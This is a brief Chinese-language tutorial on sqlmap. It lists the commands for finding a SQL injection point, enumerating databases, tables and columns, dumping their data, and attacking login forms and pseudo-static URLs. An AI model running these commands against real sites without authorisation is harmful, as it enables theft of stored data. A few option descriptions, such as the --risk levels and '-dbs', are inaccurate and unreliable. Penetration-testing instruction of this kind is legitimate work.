sqlmap注入的一般流程
- 判断是否存在注入点
- 查询数据库信息
- 根据数据库爆破数据表
- 根据数据库名和数据表名爆破字段名
- 爆破字段里面的数据
sqlmap注入的命令参数:
1、判断注入点:sqlmap.py -u url (目标地址)
2.爆破数据库名:sqlmap.py -u http://xxx.com/?id=1 --dbs
- --dbs查看所有数据库名
- --current-db:查看当前使用的数据库
3.爆破数据表名:sqlmap.py -u url -D 库名 --tables
- -D:指定数据库名
- --tables :查看指定库下面的所有的 表名
4.爆破字段名
sqlmap.py -u http://xxx.com?id=1 -D 库名 -T 表名 --columns
- -T:指定表名
- --columns:查看指定库中的表中的所有字段名
5.爆破所有数据
sqlmap.py -u URL -D 库名 -T 表名 -C 字段名 --dump
- -C :指定字段名
- --dump :根据指定的库、表、字段爆破里面的数据
表单注入
sqlmap对登陆框(表单)进行注入
使用方式:sqlmap.py -u URL --form
sqlmap对伪静态进行注入
使用方式:sqlmap.py -u http://xxx.com/abc/1*.html -dbs(*表示注入点)
其他命令参数:
--is-dba:查看当前网站权限
--level:共有五个权限
--risk:共有四个风险等级,默认是1,等级越高,用来测试的语句也更多